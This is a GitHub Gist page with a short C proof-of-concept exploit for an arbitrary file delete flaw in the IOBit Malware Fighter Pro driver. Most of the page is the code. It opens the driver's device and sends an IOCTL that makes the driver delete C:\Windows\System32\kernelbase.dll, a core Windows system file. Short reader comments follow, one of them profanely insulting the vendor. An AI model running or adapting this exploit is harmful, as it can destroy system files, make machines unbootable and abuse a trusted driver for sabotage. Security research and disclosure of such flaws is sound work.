Created
January 6, 2025 22:54
-
-
Save alfarom256/f1342f14dc6a742de7ea4004a1b6d7ed to your computer and use it in GitHub Desktop.
Arbitrary File Delete in IOBit Malware Fighter "Pro"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| const wchar_t* wstrDummyFile = LR"(\??\C:\Windows\System32\kernelbase.dll)"; | |
| const char* strDeviceName = R"(\\.\IMFForceDelete123)"; | |
| int main() { | |
| DWORD dwReturnVal = 0; | |
| DWORD dwBytesReturned = 0; | |
| BOOL bRes = FALSE; | |
| HANDLE hDevice = CreateFileA( | |
| strDeviceName, | |
| GENERIC_READ | GENERIC_WRITE, | |
| FILE_SHARE_READ | FILE_SHARE_WRITE, | |
| NULL, | |
| OPEN_EXISTING, | |
| FILE_ATTRIBUTE_NORMAL, | |
| NULL | |
| ); | |
| puts("Opened handle to device"); | |
| if (!hDevice || hDevice == INVALID_HANDLE_VALUE){ // lol I forgot which one it is oh well | |
| return GetLastError(); | |
| } | |
| bRes = DeviceIoControl( | |
| hDevice, | |
| 0x8016E000, | |
| (LPVOID)wstrDummyFile, | |
| lstrlenW(wstrDummyFile) * sizeof(wchar_t), | |
| &dwReturnVal, | |
| sizeof(DWORD), | |
| &dwBytesReturned, | |
| NULL | |
| ); | |
| if (!(bRes && dwReturnVal)) { | |
| puts("Delete failed"); | |
| CloseHandle(hDevice); | |
| return GetLastError(); | |
| } | |
| puts("Deleted target"); | |
| return 0; | |
| } |
interesting stuff! 🤝
Wow
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
File name is 100% true; IOBit is yet another shitty trashware company. Fuck 'em!